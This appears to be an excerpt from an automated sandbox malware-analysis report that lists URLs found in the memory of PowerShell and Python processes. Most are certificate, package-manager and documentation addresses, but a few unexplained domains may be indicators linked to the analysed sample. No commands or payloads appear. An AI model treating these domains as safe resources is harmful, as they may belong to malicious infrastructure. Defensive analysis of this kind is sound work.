Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000013.00000002.1690428797.000001CE4E9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso:
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C0BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dualstack.c.ssl.global.fastly.net
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D48A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dualstack.python.map.fastly.net
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hdl.handle.net/1895.22/1013
Source: powershell.exe, 00000013.00000002.1689899872.000001CE468C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1689899872.000001CE46785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2BAE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000013.00000002.1686220805.000001CE36711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2B681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2BAE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000013.00000002.1686220805.000001CE37D4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://weroos.com
Source: powershell.exe, 00000014.00000002.2426086444.0000025F298A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wsoft.com
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000014.00000002.2450559465.0000025F44830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D48A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pythonlabs.com/logos.html
Source: python.exe, 00000018.00000003.2072269174.0000023C74402000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/book/ch03.pdf
Source: powershell.exe, 00000013.00000002.1686220805.000001CE37D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1686220805.000001CE37D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=QghPBNdzUgTrevgZUhntZq2goAA8bDA9b9DS3h0nILEowfQX883iDCeTRY1
Source: powershell.exe, 00000013.00000002.1686220805.000001CE36711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2B681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2BAE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C0BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bootstrap.pypa.io
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bootstrap.pypa.io/get-pip.py
Source: powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: python.exe, 00000018.00000003.2023980303.0000023C74393000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2024935913.0000023C74393000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2022940624.0000023C74393000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2016923190.0000023C74378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/kennethreitz/requests/pull/2567.
Source: python.exe, 00000018.00000003.2067241943.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2063316044.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2031495522.0000023C7436A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2078461681.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2055692185.0000023C7436C000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2072269174.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2101837162.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2075816910.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2065656418.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2060621815.0000023C7436B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2027368506.0000023C74356000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2058908335.0000023C7436B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2069870001.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pygments/pygments/archive/master.zip#egg=Pygments-dev
Source: python.exe, 00000018.00000003.2013835157.0000023C74203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/pip/issues/7498.
Source: powershell.exe, 00000013.00000002.1686220805.000001CE37569000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000013.00000002.1689899872.000001CE468C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1689899872.000001CE46785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
